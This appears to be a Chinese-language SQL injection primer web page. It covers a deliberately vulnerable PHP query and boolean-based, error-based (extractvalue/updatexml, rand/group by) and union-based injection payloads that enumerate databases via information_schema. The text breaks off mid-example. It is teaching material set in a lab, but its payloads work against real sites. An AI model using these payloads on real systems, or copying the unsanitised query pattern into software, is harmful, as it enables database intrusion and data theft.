SQL注入详解(扫盲篇)
<p>SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。下面这篇文中就SQL注入进行一个深入的介绍,感兴趣的朋友们一起来看看吧。</p>
<p>
<span><strong>SQL注入攻击的总体思路</strong></span></p>
<p>
1.寻找到SQL注入的位置</p>
<p>
2.判断服务器类型和后台数据库类型</p>
<p>
3.针对不通的服务器和数据库特点进行SQL注入攻击</p>
<p>
<span><strong>关于 SQL Injection(SQL注入)</strong></span></p>
<p>
SQL Injection 就是通过把恶意的 SQL 命令插入到 Web 表单让服务器执行,最终达到欺骗服务器或数据库执行恶意的 SQL 命令。</p>
<p>
学习 SQL 注入,首先要搭一个靶机环境,我使用的是OWASP BWA,感兴趣的可以去官网下载一个安装,除了 SQL 注入,很多靶机环境都可以在 BWA 中找到,它专门为 OWASP ZAP 渗透工具设计的。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterphp" id="highlighter_865736">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="php variable">$id</code> <code class="php plain">= </code><code class="php variable">$_GET</code><code class="php plain">[</code><code class="php string">'id'</code><code class="php plain">];</code>
</div>
<div class="line number2 index1 alt1">
<code class="php variable">$getid</code> <code class="php plain">= </code><code class="php string">"SELECT first_name, last_name FROM users WHERE user_id = '$id'"</code><code class="php plain">;</code>
</div>
<div class="line number3 index2 alt2">
<code class="php variable">$result</code> <code class="php plain">= mysql_query(</code><code class="php variable">$getid</code><code class="php plain">) </code><code class="php keyword">or</code> <code class="php keyword">die</code><code class="php plain">(</code><code class="php string">'<pre>'</code> <code class="php plain">. mysql_error() . </code><code class="php string">'</pre>'</code> <code class="php plain">);</code>
</div>
<div class="line number4 index3 alt1">
<code class="php variable">$num</code> <code class="php plain">= mysql_numrows(</code><code class="php variable">$result</code><code class="php plain">);</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
这是一个很简单的 PHP代码,从前台获得 id 的值,交给数据库来执行,把结果返回给前台。</p>
<p>
比如我们在 OWASP 里输入 id = 1,点击 Submit,返回结果如下:</p>
<p>
<img title="SQL注入详解(扫盲篇)" alt="SQL注入详解(扫盲篇)" src="https://zhuji.jb51.net/uploads/img/202305/90aec7b87642acc35317c2687a8b3e5e.jpg"></p>
<p>
稍微懂一点后台或者数据库的人都知道,上面的那段代码是有严重问题的,没有对 id 的值进行有效性、合法性判断。也就是说,我们在 submit 输入框输入的如何内容都会被提交给数据库执行,比如在输入框输入1' or '1'='1,执行就会变成:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_117675">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">//原先要在数据库中执行的命令</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql keyword">SELECT</code> <code class="sql plain">first_name, last_name </code><code class="sql keyword">FROM</code> <code class="sql plain">users </code><code class="sql keyword">WHERE</code> <code class="sql plain">user_id = </code><code class="sql string">'1'</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">//变成</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql keyword">SELECT</code> <code class="sql plain">first_name, last_name </code><code class="sql keyword">FROM</code> <code class="sql plain">users </code><code class="sql keyword">WHERE</code> <code class="sql plain">user_id = </code><code class="sql string">'1'</code> <code class="sql color1">or</code> <code class="sql string">'1'</code><code class="sql plain">=</code><code class="sql string">'1'</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>注意一下单引号,这是 SQL 注入中非常重要的一个地方,所以注入代码的最后要补充一个 '1'='1让单引号闭合。</strong></span></p>
<p>
由于 or 的执行,会把数据库表 users 中的所有内容显示出来,</p>
<p>
<img title="SQL注入详解(扫盲篇)" alt="SQL注入详解(扫盲篇)" src="https://zhuji.jb51.net/uploads/img/202305/24f9110f4a36e476dafc384b277f2a37.jpg"></p>
<p>
下面对三种主要的注入类型进行介绍。</p>
<p>
<span><strong>Boolean-based 原理分析</strong></span></p>
<p>
首先不得不讲SQL中的AND和OR</p>
<p>
AND 和 OR 可在 WHERE 子语句中把两个或多个条件结合起来。</p>
<p>
AND:返回第一个条件和第二个条件都成立的记录。</p>
<p>
OR:返回满足第一个条件或第二个条件的记录。</p>
<p>
AND和OR即为集合论中的交集和并集。</p>
<p>
下面是一个数据库的查询内容。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_75115">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">students;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">| age |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 10056 | Doris | 20 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 10058 | Jaune | 22 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| 10060 | Alisa | 29 |</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">3 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
1)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_993578">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql keyword">TRUE</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">| age |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 10056 | Doris | 20 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 10058 | Jaune | 22 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| 10060 | Alisa | 29 |</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">3 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
2)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_810830">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql keyword">FALSE</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Empty </code><code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
3)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_452668">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">SELECT</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = 10056 </code><code class="sql color1">and</code> <code class="sql keyword">TRUE</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">| age |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 10056 | Doris | 20 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
4)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_787309">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = 10056 </code><code class="sql color1">and</code> <code class="sql keyword">FALSE</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Empty </code><code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
5)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_128926">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> selcet * </code><code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = 10056 </code><code class="sql color1">or</code> <code class="sql keyword">TRUE</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">| age |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 10056 | Doris | 20 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 10058 | Jaune | 22 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| 10060 | Alisa | 29 |</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">3 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
6)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_329154">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = 10056 </code><code class="sql color1">or</code> <code class="sql keyword">FALSE</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">| age |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 10056 | Doris | 20 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">-------+-------+-----+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
会发现and 1=1 , and 1=2 即是 and TRUE , and FALSE 的变种。</p>
<p>
这便是最基础的boolean注入,以此为基础你可以自由组合语句。</p>
<p>
字典爆破流</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_480410">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql color1">and</code> <code class="sql plain">exists(</code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">?) //?为猜测的表名</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql color1">and</code> <code class="sql plain">exists(</code><code class="sql keyword">select</code> <code class="sql plain">? </code><code class="sql keyword">from</code> <code class="sql plain">x) //?为猜测的列名</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
截取二分流</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_541903">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql color1">and</code> <code class="sql plain">(length((</code><code class="sql keyword">select</code> <code class="sql plain">schema_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.schemata limit 1))>?) //判断数据库名的长度</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql color1">and</code> <code class="sql plain">(substr((</code><code class="sql keyword">select</code> <code class="sql plain">schema_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.schemata limit 1),1,1)></code><code class="sql string">'?'</code><code class="sql plain">)</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql color1">and</code> <code class="sql plain">(substr((</code><code class="sql keyword">select</code> <code class="sql plain">schema_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.schemata limit 1),1,1)<</code><code class="sql string">'?'</code><code class="sql plain">) //利用二分法判断第一个字符</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>Boolean-based总结</strong></p>
<p>
根据前面的介绍,我们知道,对于基于Boolean-based的注入,必须要有一个可以正常访问的地址,比如<code>http: //redtiger.labs.overthewire.org/level4.php?id=1</code> 是一个可以正常访问的记录,说明id=1的记录是存在的,下面的都是基于这个进一步猜测。先来判断一个关键字keyword的长度,在后面构造<code>id=1 and (select length(keyword) from table)=1</code>,从服务器我们会得到一个返回值,如果和先前的返回值不一样,说明and后面的<code>(select length(keyword) from table)=1</code>返回false,keyword的长度不等于1。继续构造直到<code>id=1 and (select length(keyword) from table)=15</code>返回true,说明keyword的长度为15。</p>
<p>
为什么我们刚开始一定要找一个已经存在的id,其实这主要是为了构造一个为真的情况。Boolean-based就是利用查询结果为真和为假时的不同响应,通过不断猜测来找到自己想要的东西。</p>
<p>
对于keyword的值,mysql数据库可以使用<code>substr(string, start, length)</code>函数,截取string从第start位开始的length个字符串<code>id=1 and (select substr(keyword,1,1) from table) ='A'</code>,依此类推,就可以获得keyword的在数据库中的值。</p>
<p>
Boolean-based的效率很低,需要多个请求才能确定一个值,尽管这种代价可以通过脚本来完成,在有选择的情况下,我们会优先选择其他方式。</p>
<p>
<span><strong>Error Based 原理分析</strong></span></p>
<p>
关于错误回显</p>
<p>
基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上。</p>
<p>
所用到的函数</p>
<p>
<code>count() </code>统计元祖的个数(相当于求和)</p>
<p>
如<code>select count(*) from information_schema.tables; </code></p>
<p>
<code>rand()</code>用于产生一个0~1的随机数 </p>
<p>
<code>floor()</code>向下取整 </p>
<p>
group by 依据我们想要的规矩对结果进行分组 </p>
<p>
concat将符合条件的同一列中的不同行数据拼接,以逗号隔开</p>
<p>
<strong>用于错误回显的sql语句</strong></p>
<p>
第一种: 基于 <code>rand() </code>与 <code>group by </code>的错误</p>
<p>
利用<code>group by part of rand() returns duplicate key error</code>这个bug,关于<code>rand()</code>函数与<code>group by </code>在mysql中的错误报告如下:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterplain" id="highlighter_767575">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="plain plain">RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.</code>
</div>
<div class="line number2 index1 alt1">
<code class="plain plain">You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
这个bug会爆出duplicate key这个错误,然后顺便就把数据偷到了。</p>
<p>
公式:<code>username=admin' and (select 1 from (select count(), concat(floor(rand(0)2),0x23,(你想获取的数据的sql语句))x from information_schema.tables group by x )a) and ‘1' = ‘1</code></p>
<p>
第二种: XPATH爆信息</p>
<p>
这里主要用到的是<code>ExtractValue()</code>和<code>UpdateXML()</code>这2个函数,由于mysql 5.1以后提供了内置的XML文件解析和函数,所以这种注入只能用于5.1版本以后使用</p>
<p>
查看sql手册</p>
<p>
语法:<code>EXTRACTVALUE (XML_document, XPath_string);</code></p>
<p>
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc</p>
<p>
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。</p>
<p>
作用:从目标XML中返回包含所查询值的字符串</p>
<p>
语法:<code>UPDATEXML (XML_document, XPath_string, new_value);</code></p>
<p>
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc</p>
<p>
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。</p>
<p>
第三个参数:new_value,String格式,替换查找到的符合条件的数据</p>
<p>
作用:改变文档中符合条件的节点的值</p>
<p>
现在就很清楚了,我们只需要不满足XPath_string(Xpath格式)就可以了,但是由于这个方法只能爆出32位,所以可以结合mid来使用</p>
<p>
公式1:<code>username=admin' and (extractvalue(1, concat(0x7e,(你想获取的数据的sql语句)))) and ‘1'='1</code></p>
<p>
公式2:<code>username=admin' and (updatexml(1, concat(0x7e,(你想获取的数据的sql语句)),1)) and ‘1'='1</code></p>
<p>
基于错误回显的注入,总结起来就一句话,通过sql语句的矛盾性来使数据被回显到页面上,但有时候局限于回显只能回显一条,导致基于错误的注入偷数据的效率并没有那么高,但相对于布尔注入已经提高了一个档次。</p>
<p>
<span><strong>union query injection</strong></span></p>
<p>
要了解union query injection,首先得了解union查询,union用于合并两个或更多个select的结果集。比如说</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_533591">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">SELECT</code> <code class="sql plain">username, </code><code class="sql keyword">password</code> <code class="sql keyword">FROM</code> <code class="sql plain">account;</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
结果是</p>
<p>
admin 123456</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_676025">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">SELECT</code> <code class="sql plain">id, title </code><code class="sql keyword">FROM</code> <code class="sql plain">article</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
的结果是</p>
<p>
1 Hello, World</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_790956">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">SELECT</code> <code class="sql plain">username, </code><code class="sql keyword">password</code> <code class="sql keyword">FROM</code> <code class="sql plain">account</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql keyword">UNION</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql keyword">SELECT</code> <code class="sql plain">id, title </code><code class="sql keyword">FROM</code> <code class="sql plain">article</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
的结果就是</p>
<p>
admin 123456</p>
<p>
1 Hello, World</p>
<p>
比起多重嵌套的boolean注入,union注入相对轻松。因为,union注入可以直接返回信息而不是布尔值。前面的介绍看出把union会把结果拼拼到一起,所有要让union前面的查询返回一个空值,一般采用类似于id=-1的方式。</p>
<p>
1)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_43712">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">name</code> <code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = -1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">schema_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.schemata; //数据库名 </code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| information_schema |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| mysql |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| performance_schema |</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">| rumRaisin |</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">| t3st |</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">| test |</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">+</code><code class="sql comments">--------------------+</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">6 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
2)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_685993">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">name</code> <code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = -1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_schema=</code><code class="sql string">'t3st'</code><code class="sql plain">; //表名</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">----------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
